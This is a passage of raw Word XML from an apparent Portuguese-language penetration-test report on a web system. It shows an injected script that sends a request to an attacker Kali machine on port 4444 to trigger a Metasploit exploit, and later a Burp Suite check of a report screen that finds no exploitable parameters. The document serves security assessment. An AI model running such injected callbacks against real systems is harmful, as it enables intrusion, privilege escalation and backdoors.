    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="00881DA5" w:rsidP="00AC10D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O código abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  do</w:t>
      </w:r>
      <w:r w:rsidR="00790D68" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546C53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tipo GET para IP_do</w:t>
      </w:r>
      <w:r w:rsidR="00546C53" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00546C53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali_linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> na porta 4444 de forma assíncrona.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A80565" w:rsidRDefault="008C6DC7" w:rsidP="00861DF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56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00546C53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r = new </w:t>
      </w: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 xml:space="preserve">XMLHttpRequest(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00546C53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open("GET",’http://IP_do_</w:t>
      </w:r>
      <w:r w:rsid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kali_linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00546C53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:4444’,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A80565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r.setRequestHeader(“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FFFAF6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”,”*”);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A80565" w:rsidRDefault="008C6DC7" w:rsidP="00861DF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r.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00861DFE">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:r w:rsidRPr="00A80565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A80565">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80565" w:rsidRPr="00A80565" w:rsidRDefault="00A80565" w:rsidP="00AC10D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06E4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6FE7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790D68" w:rsidRPr="00D56FE7" w:rsidRDefault="00790D68" w:rsidP="00790D6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Espera-se que a máquina que hospeda o sistema não permita que a conexão seja aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00790D68" w:rsidRPr="00D56FE7" w:rsidRDefault="00790D6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90D68" w:rsidRPr="00D56FE7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B04AF1" w:rsidRPr="00D56FE7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881DA5" w:rsidRPr="00D56FE7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Pr="00D56FE7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0F06E4" w:rsidRPr="00D56FE7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790D68" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conforme mostram as figuras 29 e 30</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a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 xml:space="preserve"> requisição foi bem sucedida e o Metasploit conseguiu iniciar o exploit</w:t>
      </w:r>
      <w:r w:rsidR="00790D68" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> na máquina que hospeda o sistema explorado</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4" w:rsidRPr="00D56F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D56FE7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6FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Através desse exploit, uma conexão entre máquina atacada e o sistema atacante é aberta podendo haver graves consequências como: Escalada de privilégios na máquina atacada e criação de backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="215B9A64" wp14:editId="523EB1B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>139065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>227330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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D56FE7" w:rsidRDefault="00790D68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29</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00E52417" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Console do navegador indicando a conexão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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2A0B" w:rsidRPr="00D56FE7" w:rsidRDefault="001B2A0B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E77F75" w:rsidP="00A805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="001124EF"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 wp14:anchorId="0C5A286A" wp14:editId="79CD1FC7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1053465</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-26670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="360045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472B" w:rsidRPr="00D56FE7" w:rsidRDefault="0048472B" w:rsidP="00A8056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30 – Exploit inciado com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048472B" w:rsidRPr="00D56FE7" w:rsidRDefault="004847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472B" w:rsidRPr="00D56FE7" w:rsidRDefault="0048472B" w:rsidP="00A80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8539E" w:rsidP="008853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4.3.5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atividade: mapeamento</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de vulnerabilidades – Tela Relatório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Tarefa realizada dia 24/05/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="005A089C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uração total das sessões executadas</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 15 minutos.</w:t>
      </w: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56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C051E" w:rsidRPr="00D56FE7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Utilizar o Burp Suite para descobrir as vulnerabilidades existentes na tela Relatório e indicar as possíveis técnicas que devem ser utilizadas para explorar as vulnerabilidades encontradas.</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Isso será possível a partir da captura de informações de cookie contidas no cabeçalho HTTP da requisição executada no momento em que um relatório de dados é gerado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C051E" w:rsidRPr="00D56FE7" w:rsidRDefault="000C051E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D56FE7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A figura 31 mostra os r</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>esultados obtidos no momento de gerar um relatório d</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os dados cadastrados no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088539E" w:rsidRPr="00D56FE7" w:rsidRDefault="0088539E" w:rsidP="0088539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51591" w:rsidRPr="00D56FE7" w:rsidRDefault="00807E49" w:rsidP="0088539E">
      <w:pPr>
        <w:jc w:val="center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10F75C87" wp14:editId="7CA56E4C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>43815</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>100330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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DF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="0088539E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C051E" w:rsidRPr="00D56FE7" w:rsidRDefault="000C051E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e acordo com o</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s dados capturados através do</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite, a página não recebe nenhum parâmetro</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00874975" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">manipulável </w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para realizar a requisição no momento em que um relatório é gerado. P</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ois todos os dados disponíveis da aplicação são trazidos direto da base de dados para a tela</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:ind w:left="0"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Quando se utiliza os campos de filtros na tela, não há requisição, pois a aplicação usa os dados carregados para filtrar os dados que serão exibidos no relatório</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mediante a esse contexto, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7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D56FE7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0C051E" w:rsidRPr="00D56FE7" w:rsidRDefault="000C051E" w:rsidP="000C051E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lastRenderedPageBreak/>
        <w:t>A figura 32 mostra os resultados obtidos no momento da impressão de um relatório gerado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00D56FE7" w:rsidRDefault="00C37DA7" w:rsidP="000C051E">
      <w:pPr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4239256F" wp14:editId="255DF15C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>148590</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>178435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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488" y="21252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91" w:rsidRPr="00D56FE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Figura 3</w:t>
      </w:r>
      <w:r w:rsidR="000C051E" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Impressão de Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37DA7" w:rsidRPr="00D56FE7" w:rsidRDefault="00C37DA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74975" w:rsidP="00874975">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:ind w:left="0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D56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>De acordo com os dados capturados através do Burp Suite, a página não recebe nenhum parâmetro manipulável para realizar a requisição no momento em que um relatório é impresso. Dessa forma, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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56FE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Referências</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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D56FE7" w:rsidRDefault="00A5289A" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Piores Senhas 2015</w:t>
        </w:r>
      </w:hyperlink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2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SQLMAP usando POST</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId43"/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4" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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NTP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5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NetBios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hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SNMP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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</w:t>
      </w:r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7" w:history="1"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CORS</w:t>
        </w:r>
      </w:hyperlink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8" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00D56FE7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w3c - Especificação CORS</w:t>
        </w:r>
      </w:hyperlink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9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MYSQL</w:t>
        </w:r>
      </w:hyperlink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0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SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7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</w:pPr>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidR="008C6DC7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Oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BC5DD9" w:rsidRPr="00D56FE7" w:rsidRDefault="00A5289A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52" w:history="1">
        <w:r w:rsidR="00BC5DD9" w:rsidRPr="00D56FE7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L2TP</w:t>
        </w:r>
      </w:hyperlink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70B5" w:rsidRPr="00F15F82" w:rsidRDefault="00DB70B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B70B5" w:rsidRPr="00F15F82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83" w:rsidRDefault="00F24A83" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F24A83" w:rsidRDefault="00F24A83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83" w:rsidRDefault="00F24A83" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F24A83" w:rsidRDefault="00F24A83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4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5">
    <w:nsid w:val="0C8D2FE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54CA3D7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2F9106D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8">
    <w:nsid w:val="13CD4C22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DF268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F7571"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6C8BD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255976AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29E22E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8100E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09FAFD94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B093F67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47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6" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">
    <w:nsid w:val="2C8934BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A4817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>
    <w:nsid w:val="3B990FE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2932B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203DCA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EEE03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-26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5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23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52" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22">
    <w:nsid w:val="42E80FE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3AF6411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45963F03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11705EF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281BF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2C8E5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8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2">
    <w:nsid w:val="60252509"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27D21966"/>
    <w:lvl w:ilvl="0" w:tplc="C8F4D2F6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0A1872"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8FE87B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4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>
    <w:nsid w:val="71616484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36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7">
    <w:nsid w:val="7322209E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25EAE6DE"/>
    <w:lvl w:ilvl="0" w:tplc="44CE1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14989"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="806C3E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9853A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C74CFE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427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7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7" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="40">
    <w:nsid w:val="7D5624C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A14DB52"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3408" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3573" w:hanging="525"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts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376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12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1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848" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41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31"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2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36"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="4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062FF"/>
    <w:rsid w:val="00013EA5"/>
    <w:rsid w:val="00015DE3"/>
    <w:rsid w:val="0001600C"/>
    <w:rsid w:val="00022ED2"/>
    <w:rsid w:val="00025045"/>
    <w:rsid w:val="000355DC"/>
    <w:rsid w:val="00036A5D"/>
    <w:rsid w:val="00036F84"/>
    <w:rsid w:val="00046E12"/>
    <w:rsid w:val="00052A31"/>
    <w:rsid w:val="000536AA"/>
    <w:rsid w:val="0005686A"/>
    <w:rsid w:val="00057B33"/>
    <w:rsid w:val="00065E32"/>
    <w:rsid w:val="000673F6"/>
    <w:rsid w:val="00073AC1"/>
